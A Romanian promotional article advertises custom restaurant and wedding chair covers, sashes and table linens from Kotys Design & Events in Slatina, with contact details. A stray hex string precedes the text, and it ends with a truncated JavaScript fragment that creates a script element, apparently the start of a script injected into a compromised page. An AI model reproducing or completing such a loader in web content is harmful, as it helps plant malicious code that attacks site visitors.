8ac1a8ce35388fae9b60c4412553790fDaca vrei huse scaune pentru restaurante in diferite modele, compania Kotys Design & Events este locul ideal. Personalizate pe dimensiunile scaunelor, acestea indeplinesc toate cerintele unui design reusit si pot avea modele diferite, de tip sac sau con, standard, cu pliuri, cu falduri sau simple, in diverse materiale.

Kotys Design & Events produce huse de scaune pentru restaurante din materiale precum satinul, tafta lucioasa sau creponata, organza, crepsatin, minimat si brocart, intr-o paleta variata de culori. Clientul poate alege dimensiunile standard sau poate obtine o oferta personalizata pentru alte dimensiuni.

Firma poate realiza si esarfe decorative, din acelasi material cu husa sau din alte materiale. Indiferent de tipul de eveniment care il organizezi, elementele decorative redau caracterul special al zilei respective. Raportul calitate-pret al huselor pentru scaune este unul avantajos.

Materialele utilizate pentru confectionarea huselor pentru scaunele de restaurant sunt superioare din punct de vedere calitativ, iar dimensiunile huselor sunt personalizate, in functie de dimensiunile scaunelor. In cazul in care scaunele restaurantului tau nu sunt incluse in dimensiunile disponibile, Kotys Design & Events poate realiza huse de scaun in raport cu dimensiunile propuse de tine. Prin intermediul Kotys Design & Events ai la dispozitie o gama variata de modele dintre care sa il alegi pe cel potrivit evenimentului si poti veni chiar cu idei proprii si schite pentru alte huse, iar firma iti va crea modelul dorit. Pretul huselor depinde de modelul acestora si de materialul utilizat si in plus, ai o gama variata de culori si nuante sau combinatii intre culori.

Gama de huse de scaune pentru nunta oferita este variata si respecta toate cerintele unui decor elegant sau chiar extravagant. Husele sunt realizate dupa forma scaunului pe comanda, din materiale rezistente. Acestea se pot pune pe scaune si se pot scoate cu usurinta. In plus, husele au o croiala buna, sunt usor de spalat si calcat. Husele de scaune, alaturi de fetele de masa, pot schimba complet atmosfera unei sali de petrecere, indiferent de specificul si arhitectura acesteia.

Kotys Design & Events, infiintata in Slatina, ofera articole textile industriei HoReCa din intreaga tara. In plus, societatea se ocupa si de organizarea evenimentelor private in judetul Olt. Produsele sunt confectionate cu pricepere si rabdare si sunt realizate numai din materiale de calitate. Poti opta pentru variate produse, cum ar fi huse pentru scaune, esarfe decorative, fete de masa, huse de masa, servete, naproane. Toate aceste produse imbina creativitatea profesionistilor care creaza articole deosebite, unice. Toate serviciile si produsele oferite de firma denota implicarea, seriozitatea si profesionalismul de care da dovada in desfasurarea activitatii sale.

Pentru mai multe informatii despre husele pentru scaune si pentru comenzi, utilizeaza datele de contact ale firmei sau consulta unul dintre specialistii firmei Kotys Design & Events. Acceseaza pagina de internet si vei putea descarca oferta generala de preturi si vedea si imagini cu produsele oferite. Poti alege dimensiunile scaunelor, tesaturile si culorile pe site-ul firmei pentru ca evenimentul pe care il organizezi sa fie impecabil si elegant. Comanda husele de scaun pentru restaurante oferite de Kotys Design & Events pentru a da culoare evenimentului pe care il organizezi.

Datele de contact ale firmei Kotys Design & Events

Adresa firmei: Str. Ionescu, Nr.1, Slatina, Olt

Telefon: 0742 032 333

Email: produse@fabricadehuse.ro

var d=document;var s=d.createElement(‘script’);